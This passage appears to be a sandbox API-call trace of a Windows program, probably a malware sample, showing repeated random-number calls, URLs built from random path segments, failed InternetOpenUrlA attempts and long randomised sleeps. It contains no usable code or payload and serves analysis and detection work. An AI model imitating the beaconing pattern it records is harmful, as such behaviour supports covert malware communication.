(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.355] GetProcessHeap () returned 0x440000 [0260.355] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0260.355] lstrcpyA (in: lpString1=0x473560, lpString2="P\x1a \x03" | out: lpString1="P\x1a \x03") returned="P\x1a \x03" [0260.355] lstrcatA (in: lpString1="P\x1a \x03", lpString2="/swryW3gWm8Zni7v6gwhAr0Hm819jdqj2NtnhluyyD3/w6qfia20bbil0cvqdxdh4msn/u4wpxzgmgmcqqqOksQxXjc8t7/c4g9aar8fb948dgr0fbKgbYdf3tms/mG2nxgq4j1th7oIqjSpbzHk9swpyn8/" | out: lpString1="P\x1a \x03/swryW3gWm8Zni7v6gwhAr0Hm819jdqj2NtnhluyyD3/w6qfia20bbil0cvqdxdh4msn/u4wpxzgmgmcqqqOksQxXjc8t7/c4g9aar8fb948dgr0fbKgbYdf3tms/mG2nxgq4j1th7oIqjSpbzHk9swpyn8/") returned="P\x1a \x03/swryW3gWm8Zni7v6gwhAr0Hm819jdqj2NtnhluyyD3/w6qfia20bbil0cvqdxdh4msn/u4wpxzgmgmcqqqOksQxXjc8t7/c4g9aar8fb948dgr0fbKgbYdf3tms/mG2nxgq4j1th7oIqjSpbzHk9swpyn8/" [0260.355] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0260.355] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P\x1a \x03/swryW3gWm8Zni7v6gwhAr0Hm819jdqj2NtnhluyyD3/w6qfia20bbil0cvqdxdh4msn/u4wpxzgmgmcqqqOksQxXjc8t7/c4g9aar8fb948dgr0fbKgbYdf3tms/mG2nxgq4j1th7oIqjSpbzHk9swpyn8/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0260.355] GetProcessHeap () returned 0x440000 [0260.355] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0260.355] GetProcessHeap () returned 0x440000 [0260.355] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01a50 | out: hHeap=0x440000) returned 1 [0260.355] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0260.356] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0260.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0260.356] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0260.356] Sleep (dwMilliseconds=0x1c231) [0260.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0260.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.509] GetProcessHeap () returned 0x440000 [0260.509] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17840 [0260.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17841, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a17841) returned 0x0 [0260.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17855, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a17855) returned 0x0 [0260.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0260.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17870, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a17870) returned 0x0 [0260.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.651] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.651] GetProcessHeap () returned 0x440000 [0260.651] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0260.651] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0260.651] lstrcatA (in: lpString1="\x04", lpString2="/eQnjf22iG1h2xsf191o/5X0xTMuDsuopdIyBvuzui69qyx/tz31ajueawx4ebU3vn1umsnsw9/" | out: lpString1="\x04/eQnjf22iG1h2xsf191o/5X0xTMuDsuopdIyBvuzui69qyx/tz31ajueawx4ebU3vn1umsnsw9/") returned="\x04/eQnjf22iG1h2xsf191o/5X0xTMuDsuopdIyBvuzui69qyx/tz31ajueawx4ebU3vn1umsnsw9/" [0260.651] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0260.651] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/eQnjf22iG1h2xsf191o/5X0xTMuDsuopdIyBvuzui69qyx/tz31ajueawx4ebU3vn1umsnsw9/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0260.651] GetProcessHeap () returned 0x440000 [0260.651] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0260.651] GetProcessHeap () returned 0x440000 [0260.651] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17840 | out: hHeap=0x440000) returned 1 [0260.651] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0260.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0260.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0260.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0260.652] Sleep (dwMilliseconds=0x1d40e) [0260.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0260.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.873] GetProcessHeap () returned 0x440000 [0260.873] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02850 [0260.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02851, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a02851) returned 0x0 [0260.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.877] GetProcAddress 